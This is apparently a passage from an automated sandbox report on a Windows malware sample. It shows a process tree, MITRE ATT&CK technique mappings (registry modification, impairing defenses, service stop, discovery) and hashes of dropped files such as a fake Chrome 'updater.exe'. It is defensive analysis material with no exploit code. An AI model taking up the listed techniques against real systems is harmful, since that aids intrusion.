C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3068 -s 444
2⤵
- Checks processor information in registry
PID:2276

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3928 -s 720
1⤵
PID:2924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3692

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3692 -s 360
2⤵
PID:4932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4788 -s 460
1⤵
- Checks processor information in registry
PID:236

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4124

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4124 -s 664
2⤵
- Enumerates system info in registry
PID:4868

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 528 -s 372
2⤵
PID:2100

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3036 -s 656
2⤵
PID:4792

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4824 -s 228
2⤵
- Enumerates system info in registry
PID:3844

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2396 -s 724
2⤵
PID:1452

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2976 -s 408
1⤵
PID:3264

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER186D.tmp.csv
Filesize
35KB

MD5
1ead4817b3da0f47a1f671510e287f52

SHA1
108b9af47b27b88f30d3a5f0ccbdbb27c4424d19

SHA256
2ee321c2ea5072320cbe741e3bf86df9ebe999ed62eaa02ecf1bc63d024925f1

SHA512
9da2a6852fcb1cf9949261d719e97565918f5e93cf5be45c704bc5a10f08962b6e096b0960b161f411c2efd02341837f8b5e45d9ed2886e5766ba08cf2871914

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER190A.tmp.txt
Filesize
13KB

MD5
aefbf435bee7e778dd185ff06e1598fc

SHA1
ff8110abb913e3fc8f33f4d74d921633fc5eac47

SHA256
9ad4db46d280bf9df665b85b59d7dbe3a309b8231f093a23cc982dd3ce5c8851

SHA512
5fe87f579abac37e97f58735f8ca478c9f79a577dc90a98c5a23c85d473e3c08518a8cbfac2f3b367bd06f391d396accbfe8a3c2226674eb976e8056a9e9b44c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D13.tmp.csv
Filesize
35KB

MD5
a782752b6a68858dd60df83207c40422

SHA1
98630686a0ef38e5af393b3c9cd8d137ffa76c01

SHA256
ee3f46de7df50bd9edd0917dc6ee3caa812836f388e45f1566806a70cc067617

SHA512
118012c300ff72e6a5a5c3fa287730e21b08c80dc87974f54ece4f675ed63bb2077dd7ee0f867e3adc1e5d2eab4a90d5b798bc21ee90891fe23db8aa8c5a9c9d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D62.tmp.txt
Filesize
13KB

MD5
e65f2e0a8b84c7910824e45673708cc4

SHA1
f1c83bd46008bc04729c694d55412ced5c976139

SHA256
c17c905fd5c0d6983c523b9238597075364ed8fcf554966fbaf205208b142ffc

SHA512
b237bfd0c9b0d021010d1ea7f5a415880a5dfec012e484d375834a7e1130b579c57295be4e4bf6bef9fbb234e12993e56034206b240ff2d0485cf215ba5b28a8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2080.tmp.csv
Filesize
35KB

MD5
6795052088cbded8da7d04a6083fd39c

SHA1
7d577d77ccee90c6d53c65c238058f03d87cf873

SHA256
57af91002cdb8f02785de1c679a98c132c0350405d708d8b838ab8334004f73d

SHA512
fbf3cf204fbae6c31d02e3ddc4d0fffaf46f7e7cac832ca79fc8d2e7dc444a3755feeb4f88e4426760d83e7aa8fc6a99f31aacf6ecf90271d8b98dab05ba36b8

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER20CF.tmp.txt
Filesize
13KB

MD5
e75c9fce4d7a5a6b65773e48738938a7

SHA1
d8361b90408e92d1a08d9553d0c850db2a6886b6

SHA256
1bafbe5a60d5e1dd2ae148968cf735afb8c17a135d1cfb493a26d0a7694fdb49

SHA512
89d3429fe7b2c31d2eeacb00ec87a301ebc301b6043b991e7ac7ea7af766bf3b8676e263b7f31c5969bc8a879138ccca4f6961bdc96f1e91e2f4a90c6dc8a83a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2302.tmp.csv
Filesize
35KB

MD5
104dd3d557055dfaf384f4e378b9c61a

SHA1
3286f605cd80f7db61192aa3611481f27fa8b55a

SHA256
34bd7f87c1fdd75f7b630563e8983f077a6b94c273d086d8cd364e31027aa072

SHA512
917f5004b6c9ff1f9f4049009213ca1ea90ed908381bb037aa010ec095d3854b1d511da9823c8d6ba5c9396b054d9291c32b0262a59f9fc03cee2c50bb0487cb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2342.tmp.txt
Filesize
13KB

MD5
d8de653478cfa870495d1bc62d62f346

SHA1
657872e3a76f854281359ab94b40058a70c4e686

SHA256
794fa989c62ebe30cfa61482c769e5bc0a7795630c712e32ed4cec3ad17dbe97

SHA512
0f2f0b9747f8ad3e6f2641c3e88e588cd12afaa85110e45f519ee77fc633098592dd389029363fdc8288755e7374d1118a55582383ca1bb913bcedc3605d33b6

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER28FF.tmp.csv
Filesize
35KB

MD5
2e322df7692ef0f445c0b46a17ddddaa

SHA1
872d1c2c0b105e5606c0780ec718554c4823d6a7

SHA256
d623d2de21b965e090d1fa46798167d4fe28c66b6d073fe2d5737c68b931fdbc

SHA512
57fb5ba84bf423bb6f6494b52252514d901ac7a00ced061251d906acd20e363167225d57a448c1d18c40f8842a096e971515bf4e34dac1a0a34abe5667e84f38

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER293F.tmp.txt
Filesize
13KB

MD5
809cc9b93bf2216aef0f3499d04aee2a

SHA1
5f0016e94843a96c9a92953e978593c7dc7d39c2

SHA256
5ca9a2eac36757af0c6a4fe02517f89c4b997049cda17eb137cff88b816cae51

SHA512
1816fb38082b78ef82f71ea29077b394381c7ba6fd44fff256f9c50896f4900c57b1b82c88b30115f3d9c30db0869c05c22e6164a3e931cbf8490e8080ef08c1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D18.tmp.csv
Filesize
35KB

MD5
1ffdee48f88859dd67f84f194b19d557

SHA1
b5862a8052cdc930bb6112acc1f5e2f95b6b69c5

SHA256
f13569c1f6010fe87d5d233ee77baf035021ce71c9dcf1c6d8d21b18efa012d0

SHA512
6f7eb9231d2aa13779f59b91d967b8e4de1fc522b1935b7750f50c824efc6131329bc2c52506a47d3c81b2f66df2fcffdd9df7b70116d92b6d6aebbe4b8489d2

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D77.tmp.txt
Filesize
13KB

MD5
df1459bed8c31ab0033bdfef82b4233a

SHA1
8bbb55034d242c9dc3f086bcea34f68bfbf9d07f

SHA256
ff19de82946fc4fbeb24f3374b3c14e29824e8355d81645f02b5fe4da2ba570c

SHA512
d3ecf88967b96c3705e0e1965a106efe74f51b956ec17dabb8efe8c6da000704daf4dbd4bacda55a8a1e4236a7b342cb47b2c57898ce63c69e45109cf1933f88

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER30A5.tmp.csv
Filesize
35KB

MD5
b8dbb8cba2d3437f614a7a59910c0ae0

SHA1
b38f881aaacf4421dcdd01d639f1ee505c9800a3

SHA256
c782b2820e8a7da7b1b1f71e271808b44b05c47bd177029fa19dc8cf290076b5

SHA512
e1db0a97f6a0275ab776be5a182fd76f12ca899a4db43534c14d1a9b64d049017909f4d4df5e84e5f9d6d65fdebcc3a35a234362b4ce72ecc074841641fbf7d1

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER30F4.tmp.txt
Filesize
13KB

MD5
68efc64901dc867e8bbe2a84965dfbc3

SHA1
39bb92088291fa19aabd00196f44165402327b06

SHA256
d5809b2629e25d3d706dc98fc6d42ef84abd483760e42e6b7a63288e3e769024

SHA512
cb5dbdb3f97d6d64d2957c94c0bd6665fc8a5bc3da34bec54d9d18a94646c4dd5f54c72273715b29531f4fca2ad93362f98d206307126addfc5e63ae49f3f6ce

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3942.tmp.csv
Filesize
37KB

MD5
1498336b424e45a820be91898b79b6fe

SHA1
cd69b8825bbb326b8d0a491af45ac20b28a52ca2

SHA256
48f8b2301d31fb0fa710330aaa635d6f8581749423588ce09ec2c78817e40605

SHA512
c3a9bbb0fd1c4c412b1cb7331bb6dcf6aa3e7dfca67b83b20c25e5617f9fd5cf508ba1dea9563ea840b7b34b5a4ec244d3c5583a8f06e3880effe6a0e97fa88f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3962.tmp.csv
Filesize
37KB

MD5
9c95f55f1781ef3b7fc8c1f824b5d1c7

SHA1
54e6477a8b1e37712e5600813491c27be429fcc0

SHA256
fea314db621144b5dbca0ac41a18994e91465a3e53db33c5c7b0158e6b80abc8

SHA512
81759feab8a11ea66c656f736c7ded22bae7e0a7adc5448927516ede67156ed437fcc52113d42043852ebabe31ca939318a8040954ae405c5753a6ad24507b81

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER39B1.tmp.txt
Filesize
13KB

MD5
f6b251e6e0832bab705794ee944aa2c3

SHA1
29a3079de00be961480a24e1a2a7e6f9fae1fe0c

SHA256
9037ed34c7b176c0809e116cb29d77bfa3a3ea0293e02c06ba6db74cb86db3b9

SHA512
3d52fea342ef643fe9fe6fd9d6d91468c2fc084dd9b7a85d0f66f92e7e50423b863a07edd10947fa4916d742b673a9fe1a13150e56681612a7a8ab913dab8a0d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER39B2.tmp.txt
Filesize
13KB

MD5
c8a8f101c58bb030fde610d8aeb37be3

SHA1
9daf0ab2f8fa3136f5663d1a89f3638a6d2dc957

SHA256
b07ce73ff549e7f28885700a00045631e593b8651b39a56911f8012f21a78974

SHA512
6d2cb494de46625ae9532a36c7abf75ffed1e83ebc1206ac4febb4aa0020335b3682ea0de31604ae6bc866ff4f7ba2f21d8502432cd2163980cf9540040058f2

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER43B0.tmp.csv
Filesize
39KB

MD5
4ddfa445f072ed5b6c1b1dc49f0d0abd

SHA1
48466900047034235a4827260b05998203027a0a

SHA256
b0f51b868479f3965a01a32caf8b0b0c26107d7a1964c7af9caf3dc2485d03d1

SHA512
61e2e84f17a2eef8b274f88c76a196d2e30c94a9b917fffacfbfaa55dea4beb3edb3451c1c385f047f8427a8de3159ba6f089fa54e9a1a8864cb43f6f752c749

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER43D0.tmp.csv
Filesize
39KB

MD5
cd5892cad432d6a2aa4a2020345746e6

SHA1
3fd3e0a79943e693b9ef86ffed9153073d29ddd5

SHA256
9d933e17b24693f1f0655d3394ec811b0af415742e940e1e78ece2090576e34d

SHA512
983a5f6b181fe53a547e06b31d91c03bdf2aaa5f33480045e217965c1b8a30086f49806ab321c77754bd245c4d6a281d358eda9a18865011edee7f949698dcd6

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER441F.tmp.txt
Filesize
13KB

MD5
6d4059d54f7d56802f7455cc7a98f9c9

SHA1
80264762bdaff22f7afad9b847e3f20fe3164494

SHA256
c456676753e9c2cc7c34ba985746df490978f17633f31cef24f2b485ecb95fbc

SHA512
b2f80eb9a3fc2642c81a073317d5fb49f1f90f7f8a85cae85093a4a468069a877c67f9c4e9699f8556c098322d8e65040a5104f3c2e2dc99c41db25c837a3062

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4430.tmp.txt
Filesize
13KB

MD5
3d1907a46676d88b05dfab5d0a7c9388

SHA1
dc1ae98aacab13d33236ae9cb1668aa3f5494316

SHA256
3344e589570ad4e10eb3c374499bea5f07f78d66248c1aa80ca9890d1d8dcfcb

SHA512
c77420cea6cbe11e637121be7f5b22c702dfb7b3b2742a3c6eefdb778b6e5cdd42898f108e4f8d604463554886003312a56049b40aec318d593df731d7402208

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER480B.tmp.csv
Filesize
35KB

MD5
00f546186279a6654f0c68128e14cf55

SHA1
ab0751eee26eee3e3c0c360d844f07584ec17cda

SHA256
359c3dad45dc1523d78179e975180af36b006eebd9a26788e4ac65472a887a31

SHA512
9e90d5de5cb2cdcf3de173fef55d7ba43ba35bcbae29e0f313e58136a1fdd57e71918412f6c08aa8c555e2858f399551ccd98241feefa5bb12ae1ac562e053ec

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER48E7.tmp.txt
Filesize
13KB

MD5
070433a80a1b891b8497164fe30132e1

SHA1
836892533a9ae158d692d473b79c2bae44055226

SHA256
b27ef9efd78ecbe9db9c2cd47d6db927cfbe240c05de6f6ada67e8cffe44e7a9

SHA512
34be024bf2aee74c05842f81443b3a6751ade7ff98a5f2e3975ce3891964d5cade4db1a2a557d99e339143fa358492ceb520c0ea35f3d28b2c3685b0a65ee960

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C53.tmp.csv
Filesize
35KB

MD5
3abb848e23858d3dabb706fb2a980543

SHA1
9f8cf23ee225c843c3709e102a3c30981eea5857

SHA256
fed73bfca8e9ab4756d3c99fe421aac36dc629d297094b871bce922cf2a7dd4a

SHA512
89d1c5e539a96de59a47c5a2e6680d6f529ab26c237dbe6b7dffdc617885b0e1542a121c9ffab38abc3b79d8f0d0cd0bdbcbcaba43e4c71473b086350c86269c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CB1.tmp.txt
Filesize
13KB

MD5
7bf46c1e227952fdcfd80785f09adece

SHA1
8b64023e13f8c83ccdb1a88ef5b3496d9bea4f90

SHA256
7803050edb84c1868e6452a93364bfcbb0e3a86dc7e06b5ba4e597cd571f0a10

SHA512
c265d7630d298a1789eab8c765685c0bf1b57db87d48c6b4079e8b8c7eb7aef528d8170093022876fcf5dba0017f16a429ef37023f7623d610de691d1282a247

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FDF.tmp.csv
Filesize
35KB

MD5
38474d193c7f61c65c380724037baa84

SHA1
15da661b770c6058d6d66cc7060e002d3e47e1ac

SHA256
d1175d62a328b6fdb3f18d11278601c5575ca1ef0defed83e737460ae39058ef

SHA512
2396d6b16ef90261f831335b433e3c5ee60ee43f6d0ba4433e8727e89713efaee60589104e97213b122907cd98aeda14bf96ee1cef0334f64767dabbe9430f31

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER501E.tmp.txt
Filesize
13KB

MD5
d914c3af8bc1ddc42e7e38a7d07b2968

SHA1
7ddc28f6fd92a856c2e63e436c600f819728fdbd

SHA256
b26bcbb5475b62a28cfaade1e2a3f2226593302fefb5b84f30c698d45619e3fd

SHA512
37eef36e8c6e772dcbf5b52afc3aedbed08a1198626c3faa878d70dc5da2a0e2afb44e641cae10f80a0eb96e400d96005572389eba796501401fa5775d4b3f5e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER534C.tmp.csv
Filesize
35KB

MD5
21257f0907e09912d3e4ca74901d8878

SHA1
fc4caffec10e5596cccc8625ead2037019ee12df

SHA256
5512c9470f5073fb90a34eb2721a8b0957442e95967c666791ed9850d3b789a1

SHA512
cf3828e02103e6960e624b6823f2ad8fac5313fa1117891f57f6aae731458d25217582fda58de6ec5d92b0185dae1be996ae4eab020fecf08272e08444cc6edd

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER53BA.tmp.txt
Filesize
13KB

MD5
e118b287bc048c180b41279c9bd58954

SHA1
387afa5cfad5e30646a6330688a0f7b733c71d3c

SHA256
40f59c91aaa926ec937a2788388f4202386bd7ebff2145d360bf488b06d7a1cf

SHA512
cafacd5807cbd973bc0fae20748abc9969d4afc43bf594fbe4de14c59f6dd06837fc8b091a20f628cfde2a9e461b943afcc8763fd5eb74a1a21e2fa91220b64c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER58CC.tmp.csv
Filesize
35KB

MD5
538ca81c9e189d5fc695e8b07093ecfd

SHA1
fb5bb2255b4118f8898380fd8648a78228026bfd

SHA256
49bcd4dbaa95de7dfb5e58b94c0376eac43f4999eaa1bafc1a220e57f510be71

SHA512
d2c8774b8ec8583229c8bdb474877626f97b5052f9e671f4ae8428667239305139bceb2b2ebe5f07decb1d064428168aa480d4fbcb63caa16dbb0dc8a5a12d85

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER592B.tmp.txt
Filesize
13KB

MD5
6f7d7462d1ff56a67882413f7c37a9f4

SHA1
08fd41bfab6376741b704f474358ed2d59762c29

SHA256
c9e46f6d5a1f06987b32993bb7ec844e58adefcb699cedde14e13be7df3139e9

SHA512
6e97fe8006cf3723d40f07c219d86d532238e0719f2170b7726bc63e191c9e25a9072ab9b76cfd32b7e1e8129252f20200b01e26be3bd0abd31b2ec21fa37adf

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B3F.tmp.csv
Filesize
35KB

MD5
66e92bb9a78c0bfa5f3372b7f26543fc

SHA1
216cc5b803a6ff92010bad506bbf0ada776a3e81

SHA256
697cc4395e04ef265379d8b389a4c6fbccf39c4921dac6a4cc68990fb929f1e2

SHA512
e8e3efefa21a245e8c3351ce5ef9d47410c7e7dc72e1ead0c5f9e9f7f592fec10aacabb7ceb7706f6485027496c4f14cd7df69d3071d11a9db69dc6d3b986874

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B8E.tmp.txt
Filesize
13KB

MD5
324fa23bd20dbc2458505cc12b2f3b21

SHA1
d0ab034bd721bbcbb6d14267360fce176d477ccf

SHA256
60f08b2644ea5045a9ccef8af3936ef235365ed2d4b3ca08071ada81054b3ff6

SHA512
3d8c4da8cf41d3c66de319cb80a402520c4a8742eb7974f85bc99da1778a4c3821bea45994403b8af1229a8e9ed07ea3fadf76b3af1d72ad6471b9ab51349462

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E2F.tmp.csv
Filesize
35KB

MD5
34bf4ad66eabeb60b7e9a61f91717db1

SHA1
d994b805afe8582fef5dc97a63c440b0f948aa97

SHA256
6d3bf48dd5e9ffacf28442c8d01561cb02de2193b7327f34eaae31e7de98a979

SHA512
447acc097f9292e44691a370aeac15731bcd9239d252ae90429a5406c67467f235655767fa4f0183dd464512e990d8f7f8fd1383681fc81673c034a259e8f230

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E8E.tmp.txt
Filesize
13KB

MD5
20a9cbefb82e69b6b8ba4ce8b8cf8145

SHA1
d814570ff7a76883160f601ffe4fad3583dc4e51

SHA256
d2fce6d9c3eb389de235dc201cc3ed030fcaa0a9874ae7adf41b581f037b9296

SHA512
aeb754bd4c8c3a13bc5b69abfbaddd24fec5dc8d8ad24fe09681bdc4b23992a3b4d0654d7f92c94307a5136432a5b46dc1f5e5b6a82447f41c9104f9ca1f50f6

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6248.tmp.csv
Filesize
35KB

MD5
f4387261d247788e36f920558a9e0bfd

SHA1
691a64e516df529bd6f24a17054203c9f6f2fac8

SHA256
bd0defff346703ca872600687db8cbd4516103914063dab68f273c38ae0216c7

SHA512
47ce60af875a1c6f6cc1d82694a7e11484c5712b2840f6c56ba0b4a088ae41e6fd090bd5d9508a08a1b6b470111a594abd4e879c0849304659982a2ba1fe9fc9

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6297.tmp.txt
Filesize
13KB

MD5
711d45976dc2c0cbaad939306097d75e

SHA1
6e2db9c4391b76347623a04c76570ddc550a8a10

SHA256
c821520a7e4e37a61b65ec5ea2b1ef62e575356d51db259fbf6379fd44eb7024

SHA512
876a92a14a1413e88b648ebff001db050489b5a9fe26326073dd62042edf559be728b388cb142b7a0e8397ed4b9621b43f8caba26609b7060839d2da3145ad66

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6680.tmp.csv
Filesize
35KB

MD5
58b54e53f929548b1648e612c2e48aaa

SHA1
0e4169fbc5cc2343e05740f8ca730b078ef89167

SHA256
121379321ba73fb73eabe634ef515b7f2a56657c5ba20a710a35e63393aa26f6

SHA512
047a12e9b05a7e0a659ee2200231d9c680c7ce6eded3b0e193fa1a964d77f629eebe838be39be6dbbb9d4f55ada2a49f9946747567d7f20039a4bcbf22f96526

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER66DF.tmp.txt
Filesize
13KB

MD5
473f075293e56b9ad7a154c1a7464871

SHA1
2996f53fc0360b1d5af0325e53520a3ea448df64

SHA256
b926587e6cba850572669fa698d425e96bb358d3907bdfabb62e00336d2c94f8

SHA512
1c8e8a8169bb7558ad4d467b492bf92bf48acd0dc142b569b95057a9cf91946add4cd852d05d2a401d43c410004910ccb1f28214e91818eb9af674ed1228be21

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C4F.tmp.csv
Filesize
35KB

MD5
54446418f568b17675442ff54b74403b

SHA1
448d21772954e4884c244ea86da1b1cf8c209f62

SHA256
87429af6400cbc0a03db15bc3c3a07dd90c5675b61835a61d32e0b63eb401074

SHA512
c2819824a686d2d072bd50a41b0b27e9b87607e84954290bf588c26968ea15bd8ddd9956eefc5465244615b7fbfa531723141b057af53a8005fb0e1a6816dda2

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCA.tmp.csv
Filesize
37KB

MD5
89bba14587bbad527c1717acdd041932

SHA1
6029a7acedd82e25896ec4e47272f701539b096e

SHA256
04efdc0da3f5a97bfedd81d4328ce2e2fbc3bcb775fc71b00d48892490d1688e

SHA512
d454179e5e82f2ed77b8d8b73139b0a2a34ce73a31c90d1410263938d809f7cde93656bf9084f09c1064421eec0f819dfccb7f64540b13616dfe1c427272ce80

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA.tmp.txt
Filesize
13KB

MD5
1ba3631dc4571b55b88d2649c73e866e

SHA1
8b050bb85ebf20e951cf75d2f9db95960a90a62d

SHA256
241af7f54aec6fd216a77d2f58786f9016e4cf0f0fe8f344a35cb418f7c390b0

SHA512
21e9fa793d4c06fd153c5ed872500401ee47dadd13d52a6481e8bd89adb06748509baa10219ee6342a2a8298306a7392fb7142bd635fa324a314a68eaab59b58

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0B.tmp.csv
Filesize
36KB

MD5
8f7391a32ee95f222f0814733a1dbd46

SHA1
73ec491c9171999d64de6931b6bf415dbed0ecaf

SHA256
ee793053e07781788226f5da02dab5ae8933d7ee37f2af08bda47d5a565fecd6

SHA512
fffea4561c3ccc72fa6c1eb6fc662799aa9af5de4d845d36e3da2bedd0539aeb99bc4184d38e3809c9d12e09c7b234d8f31039982533d43ce48096ee29d1a347

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE98.tmp.txt
Filesize
13KB

MD5
2c2016e9e72363e7710a024ef733a295

SHA1
e06826f182a49c3271a0d2a65979935ba447c6e7

SHA256
ba9b0d99e24fe3932d684d3b1553b6bcf01806956179cfce648c2c57bf76300f

SHA512
1b27b27111b6bc02312f8adf14ffd0280f5c128df50394aee609d5c47da6d2f8467cd8800b0244b4074ae46bdaea674282068c132d257138928a188af893ecdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
c6c940df49fc678d1c74fea3c57a32f9

SHA1
79edd715358a82e6d29970998ff2e9b235ea4217

SHA256
4e50925adb70141467a7081cc905c76fd6dab841195400683f9f67fc2602aa0a

SHA512
3c1df9c18f1756ead841f68916dec03a066078b0705443d3f886fd990e2e42ebbffd46916be3f6fe39ea0505fc2c848fbdea56828fbd5aa5f24b329f8d979707

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
10ae6f2b5e6893c74eafd9b625c82064

SHA1
f291984547a32e3bad788411dfeee908c05f4824

SHA256
ad96f0864460f97b8ad3dcd15f084de716aeedb2b34d6df57977928e668dd237

SHA512
2b4de6c69aa1f19fe6c32ce771c6aff6684b82accb84799fe67cc0db8fc19fa96fe6cb9bfc2ee9ceb376bb1ba0116944d7b191c730c5a77a5e0f6d2245d87915

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
Filesize
512KB

MD5
a6b8f04b0cbe243eb76dfc60be4b2505

SHA1
0c2cadfa7dcc033de1f1cc54afcb31a81e4361bf

SHA256
505538f1e1a0a43adb520e90cc20ee36c8ba811795206ff4a8b615427e4abba4

SHA512
d1c1fdaf55e60a6338b6f7406b6f53c8b8dadb26780a7433446fb654af7826ea61d246950dc0f6f084850464bb63e3630a8725f9b3d4067665c92558c821ac71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
Filesize
512KB

MD5
3cf64035df002befe57b1895b33ed2af

SHA1
38d18bdf44df4dd7c0c065c59912756443cd6caf

SHA256
e0241db17ae76d16ac8007aff03d8c087b4d341d03e225308f2c9d9dc2b494ec

SHA512
f6e36fddb4268264a6586ae70ac3157b3ba777089d13543d7189ec39b81ed46c16368731e848ded31fa09d17b2c0abcd5f5f3f70a8c89d2ffae1ececd9a11f9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
Filesize
16KB

MD5
1da3f861a8228153b2e3eadb195a31b5

SHA1
